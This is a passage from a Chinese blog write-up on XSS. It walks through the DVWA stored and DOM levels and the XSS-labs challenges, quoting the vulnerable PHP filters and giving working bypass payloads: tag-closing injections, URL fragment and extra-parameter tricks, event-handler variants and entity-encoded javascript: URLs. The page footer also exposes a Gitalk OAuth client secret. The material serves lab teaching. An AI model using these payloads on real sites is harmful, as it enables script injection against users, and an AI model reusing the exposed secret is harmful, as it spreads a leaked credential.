class="hljs-string">&quot;___mysqli_ston&quot;</span>],  <span class="hljs-variable">$query</span> ) <span class="hljs-keyword">or</span> <span class="hljs-keyword">die</span>( <span class="hljs-string">&#x27;&lt;pre&gt;&#x27;</span> . ((<span class="hljs-title function_ invoke__">is_object</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>])) ? <span class="hljs-title function_ invoke__">mysqli_error</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>]) : ((<span class="hljs-variable">$___mysqli_res</span> = <span class="hljs-title function_ invoke__">mysqli_connect_error</span>()) ? <span class="hljs-variable">$___mysqli_res</span> : <span class="hljs-literal">false</span>)) . <span class="hljs-string">&#x27;&lt;/pre&gt;&#x27;</span> );<br><br>    <span class="hljs-comment">//mysql_close();</span><br>&#125;<br><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p> 这与刚才的Medium级别类似，对<code>$message</code>​做出了严格过滤，但是对<code>$name</code>​只进行了正则过滤，所以此时就可以采用反射型XSS中的High级别操作</p>
<h3 id="DOM型XSS"><a href="#DOM型XSS" class="headerlink" title="DOM型XSS"></a>DOM型XSS</h3><h4 id="Low级别-2"><a href="#Low级别-2" class="headerlink" title="Low级别"></a>Low级别</h4><p> 源码：</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-comment"># No protections, anything goes</span><br><br><span class="hljs-meta">?&gt;</span> <br></code></pre></td></tr></table></figure>

<p> 啥都没有直接传参</p>
<p> <img src="/assets/image-20240408231047-rdh6tux.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<h4 id="Medium级别-2"><a href="#Medium级别-2" class="headerlink" title="Medium级别"></a>Medium级别</h4><p> 源码：</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-comment">// Is there any input?</span><br><span class="hljs-keyword">if</span> ( <span class="hljs-title function_ invoke__">array_key_exists</span>( <span class="hljs-string">&quot;default&quot;</span>, <span class="hljs-variable">$_GET</span> ) &amp;&amp; !<span class="hljs-title function_ invoke__">is_null</span> (<span class="hljs-variable">$_GET</span>[ <span class="hljs-string">&#x27;default&#x27;</span> ]) ) &#123;<br>    <span class="hljs-variable">$default</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;default&#x27;</span>];<br>  <br>    <span class="hljs-comment"># Do not allow script tags</span><br>    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">stripos</span> (<span class="hljs-variable">$default</span>, <span class="hljs-string">&quot;&lt;script&quot;</span>) !== <span class="hljs-literal">false</span>) &#123;<br>        <span class="hljs-title function_ invoke__">header</span> (<span class="hljs-string">&quot;location: ?default=English&quot;</span>);<br>        <span class="hljs-keyword">exit</span>;<br>    &#125;<br>&#125;<br><br><span class="hljs-meta">?&gt;</span> <br></code></pre></td></tr></table></figure>

<p> 这里对<code>&lt;script&gt;</code>​标签进行了过滤，这里按照之前的思路输入<code>&lt;img src=1 onerror=alert(&#39;wuhu&#39;)&gt;</code>​</p>
<p> 发现没有反应,此时查看页面代码</p>
<p> <img src="/assets/image-20240408233923-44w2vl3.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> 发现构造的语句已经被插入到了value当中，不能成功执行的原因是<strong>select标签中只允许内嵌option标签</strong>，而option标签是不能嵌套构造的img标签的，因此需要先将前面的select标签和option标签都闭合后才能使用img标签。</p>
<p> 这里输入<code>&lt;/option&gt;&lt;/select&gt;&lt;img src=1 οnerrοr=alert(&#39;芜湖&#39;)&gt;</code>​</p>
<p> <img src="/assets/image-20240409000548-y72hyya.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<h4 id="High级别-2"><a href="#High级别-2" class="headerlink" title="High级别"></a>High级别</h4><p> 源码：</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-comment">// Is there any input?</span><br><span class="hljs-keyword">if</span> ( <span class="hljs-title function_ invoke__">array_key_exists</span>( <span class="hljs-string">&quot;default&quot;</span>, <span class="hljs-variable">$_GET</span> ) &amp;&amp; !<span class="hljs-title function_ invoke__">is_null</span> (<span class="hljs-variable">$_GET</span>[ <span class="hljs-string">&#x27;default&#x27;</span> ]) ) &#123;<br><br>    <span class="hljs-comment"># White list the allowable languages</span><br>    <span class="hljs-keyword">switch</span> (<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;default&#x27;</span>]) &#123;<br>        <span class="hljs-keyword">case</span> <span class="hljs-string">&quot;French&quot;</span>:<br>        <span class="hljs-keyword">case</span> <span class="hljs-string">&quot;English&quot;</span>:<br>        <span class="hljs-keyword">case</span> <span class="hljs-string">&quot;German&quot;</span>:<br>        <span class="hljs-keyword">case</span> <span class="hljs-string">&quot;Spanish&quot;</span>:<br>            <span class="hljs-comment"># ok</span><br>            <span class="hljs-keyword">break</span>;<br>        <span class="hljs-keyword">default</span>:<br>            <span class="hljs-title function_ invoke__">header</span> (<span class="hljs-string">&quot;location: ?default=English&quot;</span>);<br>            <span class="hljs-keyword">exit</span>;<br>    &#125;<br>&#125;<br><br><span class="hljs-meta">?&gt;</span> <br></code></pre></td></tr></table></figure>

<p> 此处使用了白名单过滤，只允许传的 default值为 French English German Spanish 其中一个</p>
<p> 所以输入时必须包含其中之一</p>
<p> 方法一:</p>
<p> 绕过服务器端的处理</p>
<p> 直接在本地运行构造的语句，可以通过<code>#</code>​来注释掉之后的内容,因为<strong>url栏中的</strong>​ <strong>​<code>#</code>​</strong> ​<strong>之后的内容不会被发送到服务器当中去，不会经过JS的过滤，只在客户端显示，可以直接与浏览器进行交互。</strong></p>
<p> 此时输入<code>English#&lt;script&gt;alert(&#39;芜湖&#39;)&lt;/script&gt;</code>​</p>
<p> <img src="/assets/image-20240409001719-z7fi2qe.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> 方法二:</p>
<p> 双参数绕过(即使用<code>&amp;</code>​拼接另一个参数)</p>
<p> 此时输入<code>English&amp;=&lt;script&gt;alert(&#39;芜湖&#39;)&lt;/script&gt;</code>​</p>
<p> <img src="/assets/image-20240409002343-dlbzmi3.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> 有些浏览器会对<code>javascript:要执行的语句</code>​进行屏蔽</p>
<p> 此时可以用<code>onclick</code>​事件触发例如<code>1&#39; onclick=&quot;alert(1)&quot;</code>​</p>
<p> <strong>其中</strong>​<strong>​<code>alert</code>​</strong>​<strong>可以替换为</strong>​<strong>​<code>confirm</code>​</strong>​<strong>和</strong>​<strong>​<code>prompt</code>​</strong>​ <strong>，并且当输出字符时，括号内的</strong>​ <strong>​<code>&quot;&quot;</code>​</strong> ​<strong>可以换为</strong>​ <strong>​<code>&#39;&#39;</code>​</strong> ​<strong>或者</strong>​ <strong>​<code>//</code>​</strong> ​</p>
<p> <code>onclick</code>​可以替换为</p>
<ol>
<li><p><code>onmouseover</code>​：当鼠标悬停在元素上时触发。</p>
 <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">a</span> <span class="hljs-attr">href</span>=<span class="hljs-string">&quot;#&quot;</span> <span class="hljs-attr">onmouseover</span>=<span class="hljs-string">&quot;alert(&quot;</span><span class="hljs-attr">Hacked</span>&quot;)&quot;&gt;</span>&#x27;&gt;what do you see?<span class="hljs-tag">&lt;/<span class="hljs-name">a</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p> <img src="/assets/image-20240327123157-y8micjy.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p><code>onkeydown</code>​：当按下键盘按键时触发。（点击链接后再按键盘任意一个键）</p>
 <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">a</span> <span class="hljs-attr">href</span>=<span class="hljs-string">&quot;#&quot;</span> <span class="hljs-attr">onkeydown</span>=<span class="hljs-string">&quot;alert(&quot;</span><span class="hljs-attr">Hacked</span>&quot;)&quot;&gt;</span>&#x27;&gt;what do you see?<span class="hljs-tag">&lt;/<span class="hljs-name">a</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p> <img src="/assets/image-20240327123421-ph05pvp.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p><code>onfocus</code>​：链接获得焦点时触发。（点击链接触发）</p>
 <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">a</span> <span class="hljs-attr">href</span>=<span class="hljs-string">&quot;#&quot;</span> <span class="hljs-attr">onfocus</span>=<span class="hljs-string">&quot;alert(&quot;</span><span class="hljs-attr">Hacked</span>&quot;)&quot;&gt;</span>&#x27;&gt;what do you see?<span class="hljs-tag">&lt;/<span class="hljs-name">a</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p> <img src="/assets/image-20240327123040-tt5zdnw.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p><code>onblur</code>​：链接失去焦点时触发。（点一下链接再点一下空白页面）</p>
 <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">a</span> <span class="hljs-attr">href</span>=<span class="hljs-string">&quot;#&quot;</span> <span class="hljs-attr">onblur</span>=<span class="hljs-string">&quot;alert(&quot;</span><span class="hljs-attr">Hacked</span>&quot;)&quot;&gt;</span>&#x27;&gt;what do you see?<span class="hljs-tag">&lt;/<span class="hljs-name">a</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p> <img src="/assets/image-20240327123004-553nr7c.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p><code>onerror</code>​</p>
<p> <img src="/assets/image-20240327125734-7t3t8w5.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
 <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">div</span> <span class="hljs-attr">id</span>=<span class="hljs-string">&quot;dom&quot;</span>&gt;</span><br>	<span class="hljs-tag">&lt;<span class="hljs-name">a</span> <span class="hljs-attr">href</span>=<span class="hljs-string">&quot;1&quot;</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">a</span>&gt;</span><br>	<span class="hljs-tag">&lt;<span class="hljs-name">img</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&quot;x&quot;</span> <span class="hljs-attr">onerror</span>=<span class="hljs-string">&quot;alert(1)&quot;</span>&gt;</span><br>	<span class="hljs-tag">&lt;<span class="hljs-name">a</span>&gt;</span>&gt;&#x27;&gt;what do you see?<span class="hljs-tag">&lt;/<span class="hljs-name">a</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">div</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p> <img src="/assets/image-20240327125141-ryqrjs0.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p><code>onsubmit</code>​：当表单提交时触发。</p>
 <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">form</span> <span class="hljs-attr">onsubmit</span>=<span class="hljs-string">&quot;alert(&#x27;Hacked&#x27;)&quot;</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;submit&quot;</span> <span class="hljs-attr">value</span>=<span class="hljs-string">&quot;Submit&quot;</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">form</span>&gt;</span><br></code></pre></td></tr></table></figure>
</li>
<li><p><code>onload</code>​：当页面或元素加载完成时触发。</p>
 <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">body</span> <span class="hljs-attr">onload</span>=<span class="hljs-string">&quot;alert(&#x27;Hacked&#x27;)&quot;</span>&gt;</span><br></code></pre></td></tr></table></figure>
</li>
<li><p><code>onchange</code>​：当元素的值发生改变时触发（通常用于表单元素）。</p>
 <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;checkbox&quot;</span> <span class="hljs-attr">onchange</span>=<span class="hljs-string">&quot;alert(&#x27;Hacked&#x27;)&quot;</span>&gt;</span><br></code></pre></td></tr></table></figure></li>
</ol>
</li>
<li><h2 id="XSS-labs"><a href="#XSS-labs" class="headerlink" title="XSS-labs"></a>XSS-labs</h2><ol>
<li><p>无任何过滤</p>
<p> <code>&lt;script&gt;alert()&lt;/script&gt;</code>​</p>
<p> <img src="/assets/image-20240811180825-k6kqrxk.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> <img src="/assets/image-20240811180913-1gkycgu.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>输出实体化，但是输入框没有实体化</p>
<p> <code>&quot;&gt;  &lt;script&gt;alert()&lt;/script&gt;  &lt;&quot;</code>​</p>
<p> （这里注意对查看的代码鼠标右键然后选择编辑html代码，才可查看真正源码）</p>
<p> 输出框对<code>&lt;</code>​和<code>&gt;</code>​进行了实体化</p>
<p> <img src="/assets/image-20240811181306-lrzt049.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> 输入框并没有对输入内容进行实体化</p>
<p> <img src="/assets/image-20240811181348-100nylo.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> <img src="/assets/image-20240811181518-2veysxe.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> 这里直接闭合符号</p>
<p> <img src="/assets/image-20240811181641-w5jpv3a.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>对输入输出均进行了实体化，利用标签事件，并使用单引号闭合</p>
<p> <code>&#39; οnfοcus=javascript:alert() &#39;</code>​</p>
<p> <img src="/assets/image-20240811181824-uu47y9j.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> <img src="/assets/image-20240811183024-0csq1vz.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>对输入输出均进行了实体化，利用标签事件，并使用双引号闭合</p>
<p> <code>&quot; οnfοcus=javascript:alert() &quot;</code>​</p>
</li>
<li><p>关键字过滤 利用其他标签调用 双引号闭合</p>
<p> <code>&quot;&gt; &lt;a href=javascript:alert()&gt;xxx&lt;/a&gt; &lt;&quot;</code>​</p>
</li>
<li><p>大小写</p>
</li>
<li><p>双写</p>
</li>
<li><p>利用Unicode编码</p>
<p> <code>&amp;#x006a&amp;#x0061&amp;#x0076&amp;#x0061&amp;#x0073&amp;#x0063&amp;#x0072&amp;#x0069&amp;#x0070&amp;#x0074&amp;#x003a&amp;#x0061&amp;#x006c&amp;#x0065&amp;#x0072&amp;#x0074&amp;#x0028&amp;#x0029</code>​</p>
<p> <img src="/assets/image-20240811183710-2fpa91l.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> <img src="/assets/image-20240811183729-xtiwubj.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> 进行编码</p>
<p> <img src="/assets/image-20240811183842-60s2gbg.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> 这个编码浏览器地址是能够识别的，但是在前端代码里不一定能够识别</p>
<p> 前端仍为编码后的内容</p>
<p> <img src="/assets/image-20240811183928-ph4ovws.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>利用Unicode编码（内容检测）</p>
<p> <code>&amp;#x006a&amp;#x0061&amp;#x0076&amp;#x0061&amp;#x0073&amp;#x0063&amp;#x0072&amp;#x0069&amp;#x0070&amp;#x0074&amp;#x003a&amp;#x0061&amp;#x006c&amp;#x0065&amp;#x0072&amp;#x0074&amp;#x0028)(&#39;http://&#39;)</code>​</p>
<p> <img src="/assets/image-20240811184105-hfuy0qn.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> <img src="/assets/image-20240811184155-vsabezn.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
</li>
<li><p>10-20</p>
<p> 考查内容偏向ctf</p>
<p> <a target="_blank" rel="noopener" href="https://blog.csdn.net/l2872253606/article/details/125638898">https://blog.csdn.net/l2872253606/article/details/125638898</a></p>
</li>
</ol>
</li>
</ol>
<p>‍</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/WEB%E6%94%BB%E9%98%B2/" class="category-chain-item">WEB攻防</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/WEB%E6%94%BB%E9%98%B2/" class="print-no-link">#WEB攻防</a>
      
        <a href="/tags/XSS%E6%BC%8F%E6%B4%9E/" class="print-no-link">#XSS漏洞</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>XSS漏洞🦠</div>
      <div>http://example.com/2024/03/26/XSS漏洞🦠/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>0z-sIHN</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年3月26日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/03/26/CSRF%E6%BC%8F%E6%B4%9E%F0%9F%91%BE/" title="CSRF漏洞👾">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">CSRF漏洞👾</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/03/26/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%F0%9F%95%B7%EF%B8%8F/" title="SQL注入漏洞🕷️">
                        <span class="hidden-mobile">SQL注入漏洞🕷️</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="gitalk-container"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#gitalk-container', function() {
      Fluid.utils.createCssLink('/css/gitalk.css')
      Fluid.utils.createScript('https://lib.baomitu.com/gitalk/1.8.0/gitalk.min.js', function() {
        var options = Object.assign(
          {"clientID":"Ov23liT0OJSQBYUz81HU","clientSecret":"02c5c39d96d158a8a34967805e40cb90a7b2f1cf","repo":"0z-sihn.github.io","owner":"0z-sIHN","admin":["0z-sIHN"],"language":"zh-CN","labels":["Gitalk"],"perPage":10,"pagerDirection":"last","distractionFreeMode":true,"createIssueManually":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token"},
          {
            id: '1cc33c5073c03757039e30af028b33db'
          }
        )
        var gitalk = new Gitalk(options);
        gitalk.render('gitalk-container');
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
<div>
  <span id="timeDate">正在载入天数...</span>
  <span id="times">载入时分秒...</span>
  <script>
  var now = new Date();
  function createtime(){
      var grt= new Date("11/10/2024 22:36:00");
      now.setTime(now.getTime()+250);
      days = (now - grt ) / 1000 / 60 / 60 / 24;
      dnum = Math.floor(days);
      hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum);
      hnum = Math.floor(hours);
      if(String(hnum).length ==1 ){
          hnum = "0" + hnum;
      }
      minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
      mnum = Math.floor(minutes);
      if(String(mnum).length ==1 ){
                mnum = "0" + mnum;
      }
      seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
      snum = Math.round(seconds);
      if(String(snum).length ==1 ){
                snum = "0" + snum;
      }
      document.getElementById("timeDate").innerHTML = "🚀已持续航行&nbsp"+dnum+"&nbsp天";  
      document.getElementById("times").innerHTML = hnum + "&nbsp时&nbsp" + mnum + "&nbsp分&nbsp" + snum + "&nbsp秒";
  }
  setInterval("createtime()",250);
  </script>
</div>

  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  
<script src="/diy_js/typing-effect.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
